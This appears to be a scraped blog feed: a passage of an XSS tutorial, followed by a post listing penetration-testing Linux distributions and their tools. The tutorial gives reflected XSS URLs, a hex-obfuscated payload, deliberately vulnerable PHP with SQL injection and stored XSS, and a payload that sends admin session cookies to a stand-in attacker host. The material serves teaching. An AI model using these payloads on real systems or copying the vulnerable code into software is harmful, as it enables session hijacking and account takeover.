<h4 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin: 0px; padding: 0px;">
Example 1:</h4>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Now the attacker will craft an URL as follows and send it to the victim:<ins style="border: none; display: inline-table; height: 250px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 300px;"><ins id="aswift_1_anchor" style="border: none; display: block; height: 250px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 300px;"><iframe allowtransparency="true" frameborder="0" height="250" hspace="0" id="aswift_1" marginheight="0" marginwidth="0" name="aswift_1" scrolling="no" style="left: 0px; margin: 0px; padding: 0px; position: absolute; top: 0px;" vspace="0" width="300"></iframe></ins></ins></div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">index.php?name=guest<script>alert('attacked')</script></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
When the victim load the above URL into the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.</div>
<h4 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin: 0px; padding: 0px;">
Example 2:</h4>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
For example, the attacker can now try to change the “Target URL” of the link “Click to Download”. Instead of the link going to “xssattackexamples.com” website, he can redirect it to go “not-real-xssattackexamples.com” by crafting the URL as shown below:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
In the above, we called the function to execute on “window.onload”. Because the website (i.e index.php) first echos the given name and then only it draws the <a> tag. So if we write directly like the one shown below, it will not work, because those statements will get executed before the <a> tag is echoed</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Normally an attacker tends not to craft the URL which a human can directly read. So he will encode the ASCII characters to hex as follows.</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e</pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
which is same as:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Now the victim may not know what it is, because directly he cannot understand that the URL is crafted and their is a more chance that he can visit the URL.</div>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
2. Persistent XSS Attack</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.</div>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
Session</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
HTTP protocol is a stateless protocol, which means, it won’t maintain any state with regard to the request and response. All request and response are independent of each other. But most of the web application don’t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the “Sessions”.</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
When the user login for the first time, a session ID will be created by the web server and it will be sent to the web-browser as “cookie”. All the sub-sequent request to the web server, will be based on the “session id” in the cookie.</div>
<h3 style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.286em; font-weight: normal; line-height: 1.222em; margin: 1.833em 0px 0.611em; padding: 0px;">
Examples for Persistent XSS Attack</h3>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
This sample web application we’ve given below that demonstrates the persistent XSS attack does the following:</div>
<ul style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; list-style: square; margin: 0px 0px 1.571em 1.571em; padding: 0px;">
<li style="margin: 0px; padding: 0px;">There are two types of users: “Admin” and “Normal” user.</li>
<li style="margin: 0px; padding: 0px;">When “Admin” log-in, he can see the list of usernames. When “Normal” users log-in, they can only update their display name.</li>
</ul>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
login.php:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;"><?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';
$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
/* Error checking the connection string */
if (!$Connect) {
echo "Database Connection Failure";
exit;
}
$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";
$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);
$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];
if(strcmp($user_pass,$row['password'])!=0) {
echo "Login failed";
}
else {
# Start the session
session_start();
$_SESSION['USER_NAME'] = $user_name;
echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
home.php:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;"><?php
session_start();
if(!$_SESSION['USER_NAME']) {
echo "Need to login";
}
else {
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';
$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);
if($_SERVER['REQUEST_METHOD'] == "POST") {
$query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
pg_query($Connect,$query);
echo "Update Success";
}
else {
if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
echo "Welcome admin<br><hr>";
echo "List of user's are<br>";
$query = "select display_name from $Schema.members where user_name!='admin'";
$res = pg_query($Connect,$query);
while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
echo "$row[display_name]<br>";
}
}
else {
echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
echo "<input type=\"submit\" value=\"Update\">";
}
}
}
?></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Now the attacker log-in as a normal user, and he will enter the following in the textbox as his display name:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;"><a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a></pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
The above information entered by the attacker will be stored in the database (persistent).</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Now, when the admin log-in to the system, he will see a link named “My Name” along with other usernames. When admin clicks the link, it will send the cookie which has the session ID, to the attacker’s site. Now the attacker can post a request by using that session ID to the web server, and he can act like “Admin” until the session is expired. The cookie information will be something like the following:</div>
<pre style="background-color: #eeeeee; border: 1px solid rgb(221, 221, 221); clear: both; color: #111111; font-family: Consolas, 'Andale Mono', Monaco, Courier, 'Courier New', Verdana, sans-serif; font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; overflow: auto; padding: 0.667em 0.917em;">xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3
</pre>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until PHPSESSID expires.</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
To understand this more, we can use a firefox addon called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3″.</div>
<div style="background-color: white; color: #111111; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21.984375px; margin-bottom: 1.571em; padding: 0px;">
We’ll cover how to use “Tamper Data” in future article of this series.</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com2tag:blogger.com,1999:blog-5727431290630009200.post-57565766167265584292013-06-09T12:37:00.001-07:002013-06-18T10:19:23.359-07:00Top 12 Penetration Testing Linux Distributions<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
OK, none of the following Pentesting distributions were in the top 100 list over at <a href="http://distrowatch.com/" style="color: #0088cc; text-decoration: none;" title="Distro Watch">Distro Watch</a> but we don’t care – we are talking about penetration testing tools – or specifically the creation of distro’s that have all the necessary open source tools that help ethical hackers and penetration testers do their job. Like everything else when it comes to choices, every pentesting distro has its own pros, cons and specialty. Some distro for example are better at web application vulnerability discovery, forensics, WiFi cracking, reverse engineering, malware analysis, social engineering etc.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>1. BackTrack 5r3</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/backtrack.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-98" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/backtrack.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="BackTrack" width="300" /></a><br />
The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be only available within a KDE environment but Gnome become was added as an option with the release of BackTrack v5. For those working in Information Security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run on a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).</strong></div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>To identify Live Hosts:</strong><br />
dnmap – Distributed NMap<br />
address6 – (which acts as a IPV6 address conversion)</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Information Gathering Analysis (Social Engineering)</strong><br />
Jigsaw – Grabs information about company employees<br />
Uberharvest – Email harvester<br />
sslcaudit – SSL Cert audit<br />
VoIP honey – VoIP Honeypot<br />
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Web Crawlers</strong><br />
Apache_users – Apache username enumerator<br />
Deblaze – Performs enumeration and interrogation against Flash remote end points</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Database Analysis</strong><br />
Tnscmd10g – Allows you to inject commands into Oracle<br />
BBQSQL – Blind SQL injection toolkit<br />
* If you are interested in Database Security see our Hacker Halted summary here.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Bluetooth Analysis</strong><br />
Blueranger – Uses link quality to locate Bluetooth devices</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Vulnerability Assessment</strong><br />
Lynis – Scans systems & software for security issues<br />
DotDotPwn – Directory Traversal fuzzer</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Exploitation Tools</strong><br />
Netgear-telnetable – Enables Telnet console on Netgear devices<br />
Terminator – Smart Meter tester<br />
Htexploit – Tool to bypass standard directory protection<br />
Jboss-Autopwn – Deploys JSP shell on target JBoss servers<br />
Websploit – Scans & analyses remote systems for vulnerabilities</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Wireless Exploitation Tools</strong><br />
Bluepot – Bluetooth honeypot<br />
Spooftooph – Spoofs or clones Bluetooth devices<br />
Smartphone-Pentest-Framework<br />
Fern-Wifi-cracker – Gui for testing Wireless encryption strength<br />
Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump<br />
Wifite – Automated wireless auditor</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Password Tools</strong><br />
Creddump<br />
Johnny<br />
Manglefizz<br />
Ophcrack<br />
Phrasendresher<br />
Rainbowcrack<br />
Acccheck<br />
smbexec</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>2. NodeZero</strong>.<br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/node-zero.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-99" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/node-zero.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="node-zero" width="300" /></a>Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) state that the distros real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it? Let us know in the comments below.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>3. BackBox Linux</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/backbox.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-102" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/backbox.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="backbox" width="300" /></a>BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
BackBox has all the usual suspect for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>4. Blackbuntu</strong>.<br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/blackbuntu.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-103" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/blackbuntu.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="blackbuntu" width="300" /></a>Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary but the tools contained within might be different to the other distros.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>5. Samurai Web Testing Framework.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/samurai.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-104" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/samurai.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="samurai" width="300" /></a>This is a live Linux distro that has been pre-configured with some of the best of open source and free tools that focus on testing and attacking websites. (The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. These steps are incorporated within the distro and contain the necessary tools to complete the task.<br />
<strong>Step 1:</strong> Reconnaissance – Tools include Fierce domain scanner and Maltego.<br />
<strong>Step 2:</strong> Mapping – Tools include WebScarab and ratproxy.<br />
<strong>Step 3:</strong> Discovery – Tools include w3af and burp.<br />
<strong>Step 4:</strong> Exploitation – Tools include BeEF, AJAXShell and much more.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethical hack without violating any laws. This is a pentesting distro recommended for penetration testers who wants to combine network and web app techniques.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>6. Knoppix STD.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/knoppix.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-105" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/knoppix.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="knoppix" width="300" /></a>This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now – in fact I think it was one of the original live distros.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>7. Pentoo.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/pentoo.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-106" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/pentoo.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="pentoo" width="300" /></a>Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>8. WEAKERTH4N.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/weakerth4n.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-107" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/weakerth4n.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="weakerth4n" width="300" /></a>This penetration distribution is built from Debian Squeeze and uses Fluxbox for its’ desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many Wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.</div>
